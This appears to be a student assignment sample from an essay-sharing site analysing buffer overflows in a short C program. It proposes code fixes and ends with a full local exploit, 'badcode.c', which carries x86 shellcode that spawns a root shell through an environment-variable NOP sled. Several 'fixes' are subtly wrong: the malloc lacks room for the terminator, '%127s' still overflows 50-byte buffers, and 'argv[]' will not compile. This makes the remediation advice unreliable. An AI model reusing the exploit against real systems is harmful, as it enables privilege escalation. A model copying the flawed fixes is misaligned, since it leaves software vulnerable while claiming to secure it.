StudentShare
Contact Us
Sign In / Sign Up for FREE
Search
Go to advanced search...
Free

Computer Security Issues - Assignment Example

Summary
The assignment "Computer Security Issues" focuses on the critical multifaceted analysis of the main issues connecting with computer security. There are potentially two overflow vulnerabilities present. The bufferer vulnerability results in the use of “strcpy”…
Download full paper File format: .doc, available for editing
GRAB THE BEST PAPER97.4% of users find it useful

Extract of sample "Computer Security Issues"

Name: Course: Tutor: Date: Computer Security Part 1 1) There are potentially two overflow vulnerabilities present. The bufferer vulnerability results in the use of “strcpy”. As given in the code, arg[1] is copied to the bufferer (filename) which can hold up to 128 bytes of data. However, the strcpy does not provide for checking of overflow as it fails to specify any specific number of characters. The second vulnerability is the fscanf function. The fscanf function reads the formatted output from stream. If the scanned (read) file is larger than the size of bufferer, we have an overflow condition. 2) The use of bound checking can help mitigate against overflow vulnerability. For the vulnerable codes given, we can change the code in order to avoid the vulnerability in the following way; A. Strcpy: IBM1 gave two ways the overflow resulting from strcpy can be mitigated. One of such is the use of strncpy in which case, the section for strcpy will read; strncpy(filename, argv[1], 127); filename[127] = '\0'; In this case, the addition of 127 ensures that the maximum data to be copied is less that the size of the bufferer. A check to avoid overflowing in the bufferer. In the event of the source file being less than the destination size, the ‘\0’ provides for filling the space with zero values. Another way to change the code to avoid vulnerability is by the use of the strcpy but dynamically allocating space when they are needed by calling the strlen() syntax on the source string. filename = (char *)malloc(strlen(argv[1])) strcpy(filename, argv[1]); B. fscanf: vulnerability due to fscanf can be mitigated by means of using a %s placeholders with length specifiers as otherwise (used in the above code) poses a problem of inherently insecure and exploitable for bufferer overflows. Thus, instead of the use of %s, we add a length specifier %127s. The non-vulnerable code can be written below: #include #include #include int main(int argc, char *argv[]) { FILE *fp; char filename[128]; char strings[USHRT_MAX][50]; unsigned short cnt = 0; /*replaces the strcpy(filename, argv[1]); */ strncpy(filename, argv[1], 127); filename[127] = '\0'; fp = fopen (filename, "r"); if (fp == NULL) { perror("Unable to open file: "); return(-1); } /*replaces the "%s" with , */ while (fscanf(fp, "%127s", strings[cnt++] ) != EOF); fclose(fp); return(0); } Alternatively, the following code could be used; #include #include #include int main(int argc, char *argv[]) { FILE *fp; char *filename; char strings[USHRT_MAX][50]; unsigned short cnt = 0; /*replaces the strcpy(filename, argv[1]); */ filename = (char *)malloc(strlen(argv[])); strcpy(filename, argv[1]); fp = fopen (filename, "r"); if (fp == NULL) { perror("Unable to open file: "); return(-1); } /*replaces the "%s", */ while (fscanf(fp, "%127s", strings[cnt++] ) != EOF); fclose(fp); return(0); } 3) One element that is common in all bufferer overflow exploits is the shellcode. It is the attacker’s code which is prompted by exploiting vulnerability in the program. It is typically planted in an input bufferer of a program that is vulnerable and then tricking the program into running the shellcode. The shellcode usually contain commands to launch a shell or a remote program. If the program that is being targeted is a server daemon running as root then the shell will also run as root. Programs running as a root give an attacker an unlimited access to the target machine (Newman 234). The program given has two possible vulnerable parts as discussed. Well-known vulnerability in the strcpy function exists. Since this function as used in the given program doesn’t check the size of the input from argv[], it is possible to overflow the 128 byte size for the bufferer that we have set up. Since bufferer is allocated on the stack, it is right before to the saved frame-pointer followed by the return address. If we write past the end of the return address, we can overwrite the return address. When this is done, the function returns it will jump to the shellcode. With the nop (null instructions) included in the program, the program counter will be advanced to the next instruction, i.e. they are a instructions. This is because the return address is just a guess and the null instructions give a level of freedom in where to jump to. The steps in the progression of this vulnerability are: i) Design a shell code, compile and run to generate the contents of the filename. An eggshell is created on the heap that is a self-contained exploit code. This is then passed to the environment variable, as our command line vulnerable program’s argument.  The eggshell is shown below (adapted from2): /* badcode.c */ #include #include /* default offset is 0 */ #define DEFOFFSET 0 /* program’s bufferer is 128 bytes */ #define DEFBUFFERSIZE 128 /* No-operation instruction */ #define NOP 0x90   /* our shellcode that spawn a root shell */ char hellcode[ ] = "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\x68""//sh" /* pushl $0x68732f2f */ "\x68""/bin" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp,%ebx */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x89\xe1" /* movl %esp,%ecx */ "\x99" /* cdql */ "\xb0\x0b" /* movb $0x0b,%al */ "\xcd\x80" /* int $0x80 */ ;   /* getting the esp, in order to determine the return address */ unsigned long getesp(void) {__asm__("movl %esp, %eax");}   int main(int argc, char *argv[]) { /* declare and initialize some of the variables */ char *buffer, *_ptr; long *addr_ptr, return_address; int i, offset=DEFOFFSET, buffersize=DEFBUFFERSIZE;   /* If 1st argument supplied, it is the bufferer size, else use default */ if(argc>1) buffersize = atoi(argv[1]); /* If 2nd argument is supplied, it is the offset, else use default */ if(argc>2) offset = atoi(argv[2]);   /* using the heap bufferer, for the string construction */ if(!(buffer = malloc(buffersize))) {printf("Memory allocation for bufferer failed lor!\n"); exit (0); }   /* get the return address */ return_address = getesp() - offset;   /* copy the return address into the bufferer, by word size */ for (i=0; i< buffersize; i+=4) *(addr_ptr++) = return_address;   /* copy half of the bufferer with NOP, by byte size */ for (i=0; i < buffersize/2; i++) buffer[i] = NOP;   /* copy the shellcode after the NOPs, by byte */ _ptr = buffer + ((buffersize/2) - (strlen(hellcode)/2)); for (i=0; i < strlen(hellcode); i++) *(_ptr++) = hellcode[i];   /* Terminate the string’s bufferer with NULL */ buffer[buffersize-1] = '\0'; /* Now that we've got the string built */   /* Copy the "EGG=" string into the bufferer, so that we have "EGG=our_string" */ memcpy(buffer, "EGG=", 4); /* Put the bufferer, "EGG=our_string", in the environment variable,  as an input for our vulnerable program*/ putenv(buffer); /* run the root shell, after the overflow */ system("/bin/bash"); return 0; } ii) Next we run the vulnerable program with argument read from the environment variable to get to the root shell. This could be possible using the same code as in the lab section: $ gcc -o exploit badcode.c $./badcode // create the badfile with bufferer size as an argument $./vulnerable // launch the attack by running the vulnerable program # Read More

CHECK THESE SAMPLES OF Computer Security Issues

Practical Windows Security

From the paper "Practical Windows security" it is clear that Aasystem health check recognizes possible performance problems by means of chosen individual systems.... Windows Domain Structure is fundamental to implementing a well-organized computer network.... Two categories of inputs can be measured or employed when carrying out server health checks....
10 Pages (2500 words) Essay

Computer Security or Ethical Issue

This paper outlines various security issues along with their solutions.... This research paper "computer security or Ethical Issue" shows that due to the amazing efficiency of a computer system, every business feels the need to utilize computer technology inside the business infrastructure to enhance its operational performance.... his paper presents a detailed overview of computer security.... This paper discusses how computer security has become an important issue for companies....
9 Pages (2250 words) Research Paper

Security Framework in the Modern World

The paper "security Framework in the Modern World" highlights that the use of such security frameworks as the ISO 27000 series is essential for the development of and preservation of the diverse databases that have come to be heavily rely on all over the world.... The ISO 27000 Series security framework has been a priority in many individual agencies because most agencies are created to be able to accomplish their own missions making the security framework to be viewed as an important factor, which has to be budgeted for to ensure the tackling of information security threats....
5 Pages (1250 words) Research Paper

Importance of a PC Security

Cumulative learning Security Issues  Network Security Danger Personal Computer Security Issues Possible damage through security attacks Valuable systems and tools for an effective security management Suitable security and privacy management and handling Works CitedMcAfee, Inc.... This system is really fast and effective in case of possible security issues detection.... Nowadays a lot of security and privacy related issues and threats have excessively emerged....
3 Pages (750 words) Essay

Why Is the Computer Security Important

The basic purpose of the research is to discuss Computer Security Issues and their solutions.... My interest lies in exploring some of the serious Computer Security Issues that cause serious challenges for computer users.... I would research on the internet and would get information from different journals and articles to recognize the latest security issues and solutions.... In the essay 'Why Is the computer security Important?...
2 Pages (500 words) Essay

Computer Security

This paper outlines various security issues along with their solutions.... The paper gives detailed information about the computer security.... This paper presents a detailed overview of computer security.... This paper discusses how computer security has become an important issue for the companies.... In view of the fact that the word computer security is employed regularly; however, the framework of a computer system is defenseless to a number of threats except the system is linked with more computer systems using some sort of network arrangement....
9 Pages (2250 words) Research Paper

Risk Analysis of the InSycure Computer System

Organizations are required to deal with complex computer and information security issues.... has well-established networked security, the network environment is not pretty well-managed to ensure computer and information security requirements of availability, integrity, authenticity, and confidentiality.... In this report, a Risk Analysis for the InSycure computer system has been performed, and a security Plan and a Disaster Recovery Plan (DRP) have been developed for InSycure based on the identified threats or risks and their likelihood vulnerabilities....
8 Pages (2000 words) Assignment

Ethical Teaching as a Solution to Computer Security Problems

The information presented herein is supported by adequate literature sources that demonstrate that indeed software licensing is antisocial and that ethical teaching could be the solution to Computer Security Issues.... Additionally, besides technical efforts, there are better ways of resolving Computer Security Issues other than removing security measures in order to reduce computer fraud.... Finally, educating professionals on computer security does appear to be one of the solutions to Computer Security Issues....
6 Pages (1500 words)
sponsored ads
We use cookies to create the best experience for you. Keep on browsing if you are OK with that, or find out how to manage cookies.
Contact Us